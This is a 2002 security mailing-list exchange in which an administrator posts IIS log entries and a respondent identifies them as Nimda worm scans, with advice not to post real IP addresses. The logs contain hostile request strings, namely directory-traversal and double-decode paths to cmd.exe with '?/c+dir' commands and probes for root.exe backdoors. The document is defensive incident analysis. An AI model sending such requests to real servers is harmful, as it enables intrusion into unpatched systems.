Hello Jim,

these traces look like a worm called nimda which appeared last year.

Here is a sample trace:


2001-09-19 00:00:00 x.x.x.x y.y.y.y GET /scripts/root.exe 404 820 72 80
HTTP/1.0 - -
2001-09-19 00:00:00 x.x.x.x y.y.y.y GET /MSADC/root.exe 404 820 70 80
HTTP/1.0 - -
2001-09-19 00:00:00 x.x.x.x y.y.y.y GET /c/winnt/system32/cmd.exe 404 820 80
80 HTTP/1.0 - -
2001-09-19 00:00:00 x.x.x.x y.y.y.y GET /d/winnt/system32/cmd.exe 404 820 80
80 HTTP/1.0 - -
2001-09-19 00:00:00 x.x.x.x y.y.y.y GET
/scripts/..%5c../winnt/system32/cmd.exe 404 820 96 80 HTTP/1.0 - -
2001-09-19 00:00:00 x.x.x.x y.y.y.y GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404 820 117 80
HTTP/1.0 - -
2001-09-19 00:00:00 x.x.x.x y.y.y.y GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404 820 117 80
HTTP/1.0 - -
2001-09-19 00:00:00 x.x.x.x y.y.y.y GET
/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe 404
820 145 80 HTTP/1.0 - -
2001-09-19 00:00:00 x.x.x.x y.y.y.y GET
/scripts/..Á../winnt/system32/cmd.exe 404 820 97 80 HTTP/1.0 - -
2001-09-19 00:00:00 x.x.x.x y.y.y.y GET /scripts/winnt/system32/cmd.exe 404
820 97 80 HTTP/1.0 - -
2001-09-19 00:00:00 x.x.x.x y.y.y.y GET /winnt/system32/cmd.exe 404 820 97
80 HTTP/1.0 - -
2001-09-19 00:00:00 x.x.x.x y.y.y.y GET /winnt/system32/cmd.exe 404 820 97
80 HTTP/1.0 - -
2001-09-19 00:00:00 x.x.x.x y.y.y.y GET
/scripts/..%5c../winnt/system32/cmd.exe 404 820 98 80 HTTP/1.0 - -
2001-09-19 00:00:00 x.x.x.x y.y.y.y GET
/scripts/..%5c../winnt/system32/cmd.exe 404 820 96 80 HTTP/1.0 - -
2001-09-19 00:00:00 x.x.x.x y.y.y.y GET
/scripts/..%5c../winnt/system32/cmd.exe 404 820 100 80 HTTP/1.0 - -
2001-09-19 00:00:00 x.x.x.x y.y.y.y GET
/scripts/..%2f../winnt/system32/cmd.exe 404 820 96 80 HTTP/1.0 - -

This is the whole trace of a nimda-scan.
The Worm tried to find a backdoor placed earlier by another worm, called
Code Red II or III   I think.

One final remark!
Never post a trace like yours on an open list with original IP-Addresses in
it, even if its not yours!!!!

In this case, if its nimda, this machine is infected, and has probably still
the vulnerability and backdoor on it.
Better inform the owner of the machine and do not post the Ip-Address.


Holger Reichert
www.holysword.de
[EMAIL PROTECTED]

-----Ursprüngliche Nachricht-----
Von: Jim Grossl [mailto:[EMAIL PROTECTED]]
Gesendet: Dienstag, 15. Januar 2002 17:24
An: [EMAIL PROTECTED]
Betreff: IIS log files, can I have your take on these attacks?




207.225.190.149 -- [14/Jan/2002:10:30:22 -0700] 
  "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 3396

207.225.190.149 -- [14/Jan/2002:10:30:22 -0700] 
  "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 3396

207.225.190.149 -- [14/Jan/2002:10:30:22 -0700] 
  "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396

207.225.190.149 -- [14/Jan/2002:10:30:22 -0700] 
  "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396

207.225.190.149 -- [14/Jan/2002:10:30:23 -0700] 
  "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 401 3837

207.225.190.149 - - [14/Jan/2002:10:30:25 -0700] 
  "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396



I kind of bothers me to post these on an open list (apparently
our Web server doesn't need any more "attention") but
I would like to know what everyone thinks of these attacks. My
Web server logged > 2000 of these attacks over the weekend. I'm 
pretty sure that attacks are not succeeding, but I've read that
if the "%5c" shows up in the Double Decode attack that the file
traversal is taking place. Thanks.

Jim Grossl

Reply via email to